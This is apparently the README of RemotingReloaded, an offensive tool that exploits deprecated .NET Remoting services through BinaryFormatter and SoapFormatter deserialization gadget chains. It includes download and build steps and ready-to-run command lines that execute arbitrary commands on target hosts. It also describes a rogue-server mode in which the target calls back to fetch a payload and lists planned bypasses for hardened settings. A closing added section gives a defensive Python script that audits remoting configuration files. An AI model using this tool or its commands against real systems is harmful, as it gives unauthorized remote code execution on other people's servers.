Cross-platform .NET 8 tool for exploiting legacy .NET Remoting services. Supports both TCP and HTTP channels with inline payload generation. No .NET Framework dependency, no ysoserial.net required at runtime.
Built on research and prior work by:
```
.
├── README.md              # This file
├── RemotingReloaded/      # Main .NET solution
│   └── README.md          # Tool usage and flags
└── Scripts/               # Scripts for generating wordlists
    └── README.md          # Script usage
```
.NET Remoting services are still present in a lot of enterprise environments despite the technology being deprecated forever ago.
When exposed on the network, they are typically exploitable via deserialization gadget chains because BinaryFormatter and SoapFormatter are used on the wire.
This tool automates that exploitation for both TCP (BinaryFormatter) and HTTP (SoapFormatter) channels.
It handles payload generation internally, so there is no dependency on external tooling.
Runs on Linux, macOS (untested but should be fine), and Windows.
Supported attack chains:
- TypeConfuseDelegate (TCP, directly sent): raw NRBF bytes sent directly to the remoting channel.
- ObjRef + Rogue Server (TCP/HTTP): sends an ObjRef trigger pointing at a built-in rogue TCP server. Target phones home, rogue server delivers TypeConfuseDelegate. Safer than direct send.
- TextFormattingRunProperties (HTTP, direct): XAML ObjectDataProvider gadget wrapped in a SOAP envelope, exploits `XamlReader.Parse()` on the target.
Download the appropriate binary for your platform from the Releases page. No runtime installation required, all binaries are self-contained.
| Platform | File |
|---|---|
| Linux x64 | RemotingReloaded-linux-x64 |
| Windows x64 | RemotingReloaded-win-x64.exe |
| macOS x64 | RemotingReloaded-osx-x64 |
| macOS ARM64 | RemotingReloaded-osx-arm64 |
```bash
# Linux / macOS make executable
chmod +x RemotingReloaded-linux-x64
# Single target
./RemotingReloaded-linux-x64 -t tcp://192.168.1.10:4242 -c "whoami > /tmp/pwned"
# Windows
## CMD
RemotingReloaded-win-x64.exe -t tcp://192.168.1.10:4242 -c "calc.exe"
## PowerShell
.\RemotingReloaded-win-x64.exe -t tcp://192.168.1.10:4242 -c "calc.exe"
```

Requires .NET 8 SDK.
```bash
cd RemotingReloaded
dotnet build -c Release
# Or publish a self-contained single binary
dotnet publish -c Release -r linux-x64 --self-contained true -p:PublishSingleFile=true
dotnet publish -c Release -r win-x64 --self-contained true -p:PublishSingleFile=true
dotnet publish -c Release -r osx-x64 --self-contained true -p:PublishSingleFile=true
dotnet publish -c Release -r osx-arm64 --self-contained true -p:PublishSingleFile=true
```

```bash
# Build the image (linux-x64)
docker build -t remoting-reloaded .
# Single inline target
docker run --rm --network host remoting-reloaded -t tcp://192.168.1.10:4242 -c "calc.exe"
# Targets file with log output (you can use volumes to persist logs or use custom wordlists)
docker run --rm --network host \
  -v $(pwd)/data:/data \
  remoting-reloaded \
  -t /data/targets.txt -c "calc.exe" --log-file /data/run.log
```

Note: `--network host` is required for ObjRef/rogue server mode so the target can reach the rogue TCP listener on your machine. If your targets are remote, ensure your rogue server port (default `54321`) is reachable from the target network.
See RemotingReloaded/README.md for further example usage of the tool.
| Feature | Status |
|---|---|
| TCP exploitation (TypeFilterLevel = Full) | Done |
| HTTP exploitation (TypeFilterLevel = Full) | Done |
| ObjRef / rogue server mode | Done |
| Built-in wordlist | Done |
| TypeFilterLevel = Low bypasses | Not yet implemented |
| Secure channel (authenticated TCP) | Not yet implemented |
The following are areas for future exploration if time allows.
- TypeFilterLevel = Low bypasses: Services configured with `typeFilterLevel = Low` block the current gadget chains via CAS. Bypasses exist (lease-based techniques, IRemotingTypeInfo tricks) but require further development to be implemented.
- Authenticated TCP channels: Secure channels with Windows/Kerberos auth currently cause the tool to hang. Support would require research and development to handle SSPI negotiation and authentication that the .NET Framework client normally handles.
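
For defenders inventorying affected services, the two settings named in the feature table (`typeFilterLevel` and the secure channel) can be read from a service's remoting configuration file. The following is an added example, not part of RemotingReloaded: the sample config, the `audit_remoting_config` helper and the severity labels are constructed here. It assumes channels are declared in the `<system.runtime.remoting>` config section rather than registered in code, and that a channel without a `port` attribute is client-side only.

```python
import xml.etree.ElementTree as ET

# Constructed sample config for illustration, not from a real service.
SAMPLE_CONFIG = """<configuration><system.runtime.remoting><application>
  <channels>
    <channel ref="tcp" port="4242">
      <serverProviders>
        <formatter ref="binary" typeFilterLevel="Full" />
      </serverProviders>
    </channel>
    <channel ref="tcp" port="4243" secure="true">
      <serverProviders><formatter ref="binary" /></serverProviders>
    </channel>
    <channel ref="tcp" />
  </channels>
</application></system.runtime.remoting></configuration>"""

def _attr(elem, name, default=""):
    """Case-insensitive attribute lookup."""
    for key, value in elem.attrib.items():
        if key.lower() == name.lower():
            return value
    return default

def audit_remoting_config(xml_text):
    """Return one finding per listening channel (hypothetical helper)."""
    findings = []
    for channel in ET.fromstring(xml_text).iter("channel"):
        port = _attr(channel, "port")
        if not port:
            continue  # no port attribute: client-side channel, not a listener
        formatters = channel.findall("serverProviders/formatter")
        # typeFilterLevel defaults to Low when the attribute is absent.
        full = any(_attr(f, "typeFilterLevel", "Low").lower() == "full"
                   for f in formatters)
        secure = _attr(channel, "secure", "false").lower() == "true"
        if full:
            severity = "high"      # the setting the page lists as exploitable
        elif not secure:
            severity = "medium"    # Low, but unauthenticated; bypasses exist
        else:
            severity = "low"
        findings.append({"port": port, "type_filter_level": "Full" if full else "Low",
                         "secure": secure, "severity": severity})
    return findings

if __name__ == "__main__":
    for finding in audit_remoting_config(SAMPLE_CONFIG):
        print(finding)
```

A `low` result still describes a BinaryFormatter endpoint on a deprecated stack, so it belongs on the migration list rather than the cleared list.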